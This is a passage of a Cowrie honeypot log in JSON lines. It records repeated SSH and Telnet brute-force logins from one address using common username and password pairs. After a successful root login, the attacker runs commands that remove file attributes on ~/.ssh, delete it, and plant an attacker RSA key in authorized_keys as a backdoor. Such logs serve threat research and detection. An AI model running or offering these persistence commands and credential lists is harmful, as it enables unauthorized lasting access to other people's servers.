m@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:46:15.896361Z","src_ip":"212.227.235.229","session":"068a58f4091d"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"12345678","message":"login attempt [anonymous/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:46:16.878080Z","src_ip":"212.227.235.229","session":"068a58f4091d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:46:18.117842Z","src_ip":"212.227.235.229","session":"068a58f4091d"}
{"eventid":"cowrie.session.closed","duration":30.60388469696045,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:46:21.189149Z","src_ip":"212.227.235.229","session":"d67b6a893272"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58986,"dst_ip":"1.2.3.4","dst_port":22,"session":"69a6d70d9af8","protocol":"ssh","message":"New connection: 212.227.235.229:58986 (1.2.3.4:22) [session: 69a6d70d9af8]","sensor":"my-vps","timestamp":"2025-09-09T01:46:32.092018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:46:32.092973Z","src_ip":"212.227.235.229","session":"69a6d70d9af8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:46:32.356745Z","src_ip":"212.227.235.229","session":"69a6d70d9af8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42934,"dst_ip":"1.2.3.4","dst_port":22,"session":"a143fd2b4e2c","protocol":"ssh","message":"New connection: 212.227.235.229:42934 (1.2.3.4:22) [session: a143fd2b4e2c]","sensor":"my-vps","timestamp":"2025-09-09T01:46:32.370764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:46:32.371719Z","src_ip":"212.227.235.229","session":"a143fd2b4e2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:46:32.625898Z","src_ip":"212.227.235.229","session":"a143fd2b4e2c"}
{"eventid":"cowrie.login.failed","username":"test","password":"111111","message":"login attempt [test/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:46:33.452596Z","src_ip":"212.227.235.229","session":"69a6d70d9af8"}
{"eventid":"cowrie.login.failed","username":"csserver","password":"csserver","message":"login attempt [csserver/csserver] failed","sensor":"my-vps","timestamp":"2025-09-09T01:46:33.683064Z","src_ip":"212.227.235.229","session":"a143fd2b4e2c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:46:34.718637Z","src_ip":"212.227.235.229","session":"69a6d70d9af8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:46:34.938736Z","src_ip":"212.227.235.229","session":"a143fd2b4e2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36156,"dst_ip":"1.2.3.4","dst_port":23,"session":"83d39e960ee0","protocol":"telnet","message":"New connection: 212.227.235.229:36156 (1.2.3.4:23) [session: 83d39e960ee0]","sensor":"my-vps","timestamp":"2025-09-09T01:46:34.969352Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:46:35.183993Z","src_ip":"212.227.235.229","session":"83d39e960ee0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:46:35.211322Z","src_ip":"212.227.235.229","session":"83d39e960ee0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41212,"dst_ip":"1.2.3.4","dst_port":22,"session":"2102f874f307","protocol":"ssh","message":"New connection: 212.227.235.229:41212 (1.2.3.4:22) [session: 2102f874f307]","sensor":"my-vps","timestamp":"2025-09-09T01:46:35.575464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:46:35.576100Z","src_ip":"212.227.235.229","session":"2102f874f307"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:46:35.808444Z","src_ip":"212.227.235.229","session":"2102f874f307"}
{"eventid":"cowrie.login.failed","username":"user1","password":"12345","message":"login attempt [user1/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:46:36.776812Z","src_ip":"212.227.235.229","session":"2102f874f307"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:46:38.012003Z","src_ip":"212.227.235.229","session":"2102f874f307"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34888,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0b1a2f15757","protocol":"ssh","message":"New connection: 212.227.235.229:34888 (1.2.3.4:22) [session: c0b1a2f15757]","sensor":"my-vps","timestamp":"2025-09-09T01:46:42.058633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:46:42.059516Z","src_ip":"212.227.235.229","session":"c0b1a2f15757"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:46:42.329370Z","src_ip":"212.227.235.229","session":"c0b1a2f15757"}
{"eventid":"cowrie.login.failed","username":"builder","password":"builder.123","message":"login attempt [builder/builder.123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:46:43.449543Z","src_ip":"212.227.235.229","session":"c0b1a2f15757"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:46:44.722444Z","src_ip":"212.227.235.229","session":"c0b1a2f15757"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47472,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cecce60cb70","protocol":"ssh","message":"New connection: 212.227.235.229:47472 (1.2.3.4:22) [session: 8cecce60cb70]","sensor":"my-vps","timestamp":"2025-09-09T01:46:54.811534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:46:54.812209Z","src_ip":"212.227.235.229","session":"8cecce60cb70"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:46:55.053316Z","src_ip":"212.227.235.229","session":"8cecce60cb70"}
{"eventid":"cowrie.login.failed","username":"user1","password":"12345","message":"login attempt [user1/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:46:56.059991Z","src_ip":"212.227.235.229","session":"8cecce60cb70"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:46:57.304029Z","src_ip":"212.227.235.229","session":"8cecce60cb70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57338,"dst_ip":"1.2.3.4","dst_port":22,"session":"10e4c4136aa2","protocol":"ssh","message":"New connection: 212.227.235.229:57338 (1.2.3.4:22) [session: 10e4c4136aa2]","sensor":"my-vps","timestamp":"2025-09-09T01:47:27.882886Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:47:27.883808Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:47:28.112951Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123321","message":"login attempt [root/Aa123321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:47:29.063024Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50880,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0ca5d33c799","protocol":"ssh","message":"New connection: 212.227.235.229:50880 (1.2.3.4:22) [session: e0ca5d33c799]","sensor":"my-vps","timestamp":"2025-09-09T01:47:29.080870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:47:29.081555Z","src_ip":"212.227.235.229","session":"e0ca5d33c799"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:47:29.348954Z","src_ip":"212.227.235.229","session":"e0ca5d33c799"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:47:29.577733Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:47:29.578436Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:47:29.579518Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:29.807336Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:47:30.323975Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:47:30.324637Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam","message":"login attempt [sam/sam] failed","sensor":"my-vps","timestamp":"2025-09-09T01:47:30.374097Z","src_ip":"212.227.235.229","session":"e0ca5d33c799"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:47:30.555017Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:30.555924Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57346,"dst_ip":"1.2.3.4","dst_port":22,"session":"0df9da44e852","protocol":"ssh","message":"New connection: 212.227.235.229:57346 (1.2.3.4:22) [session: 0df9da44e852]","sensor":"my-vps","timestamp":"2025-09-09T01:47:30.791900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:47:30.794478Z","src_ip":"212.227.235.229","session":"0df9da44e852"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:47:31.026918Z","src_ip":"212.227.235.229","session":"0df9da44e852"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:31.622060Z","src_ip":"212.227.235.229","session":"e0ca5d33c799"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:47:31.961137Z","src_ip":"212.227.235.229","session":"0df9da44e852"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:33.197779Z","src_ip":"212.227.235.229","session":"0df9da44e852"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57350,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c95c0654313","protocol":"ssh","message":"New connection: 212.227.235.229:57350 (1.2.3.4:22) [session: 1c95c0654313]","sensor":"my-vps","timestamp":"2025-09-09T01:47:33.436391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:47:33.437487Z","src_ip":"212.227.235.229","session":"1c95c0654313"}
